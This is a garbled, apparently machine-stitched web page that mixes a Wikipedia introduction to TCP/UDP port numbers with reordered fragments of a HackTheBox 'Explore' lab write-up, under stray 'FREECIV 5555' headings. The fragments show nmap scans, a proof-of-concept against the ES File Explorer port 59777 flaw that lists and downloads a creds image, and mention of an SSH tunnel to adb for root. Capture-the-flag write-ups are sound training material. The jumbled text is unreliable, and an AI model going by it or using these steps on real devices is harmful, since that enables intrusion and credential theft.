Similarly, many of the official assignments refer to protocols that were never or are no longer in common use. However, many unofficial uses of both well-known and registered port numbers occur in practice. The Internet Assigned Numbers Authority (IANA) is responsible for maintaining the official assignments of port numbers for specific uses. They usually use port numbers that match the services of the corresponding TCP or UDP implementation, if they exist. The Transmission Control Protocol (TCP) and the User Datagram Protocol (UDP) only need one port for duplex, bidirectional traffic. This is a list of TCP and UDP port numbers used by protocols for operation of network applications. ( Learn how and when to remove this template message) ( October 2016) ( Learn how and when to remove this template message) Unsourced or poorly sourced material may be challenged or removed. Please help improve this article by adding citations to reliable sources that describe the examples' significance, and by removing less pertinent examples. The commands are the following.This article gives self-sourcing popular culture examples without describing their significance in the context of the article.
Once the tunnel has been created we can connect to the device using adb, becoming root pretty easily.
FREECIV 5555 PASSWORD
In this photo we can read the user kristi and the password that can be used for getting access through ssh. jpg -host 10.10.10.247 Server responded with : 200 Writing to file : creds. py - g / storage / emulated / 0 / DCIM / creds. kali : / tmp / ESFileExplorerOpenPortVuln$ python3 poc.
FREECIV 5555 DOWNLOAD
10.247 Server responded with : 200 īetween all of them there is a file named creds.jgp that we can download with the following command. 10.247 Executing command : listPics on 10.10. : /tmp/ESFileExplorerOpenPortVuln$ python3 poc.py -cmd listPics -host 10.10. ExploitationĮxecuting the PoC we can obtain the pictures stored in the device. Looking on google about information for each port we discover that the port 59777 is used by the application ES File Explorer and has an CVE with a PoC on GitHub.
# Nmap done at Sat Jun 26 17:26:02 2021 - 1 IP address (1 host up) scanned in 109.46 seconds If you know the service/version, please submit the following fingerprints at : Service detection performed. Ģ services unrecognized despite returning data. |_http-title: Site doesn' t have a title ( text/plain ). | _http-title: Site doesn 't have a title (text/html).ĥ9777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older 42135 /tcp open http ES File Explorer Name Response httpd 10.247Ģ222 /tcp open ssh ( protocol 2.0 ) | fingerprint-strings: Then, we continue with a deeper scan of every opened port getting more information about each service. Nmap done: 1 IP address ( 1 host up ) scanned in 168.58 seconds sudo nmap -sS -p-n -T5 -oN AllPorts.txt 10.10. EnumerationĪs always, let's start finding all opened ports in the machine with nmap.
Later, the attacker will have to use a SSH tunnel in order to access to the device using adb and becoming root.
FREECIV 5555 ANDROID
Explore is a very easy Android machine from HackTheBox where the attacker will have to exploit a vulnerability for the application Es File Explorer in order to obtain RCE on the machine, obtaining the user credentials.
0 kommentar(er)
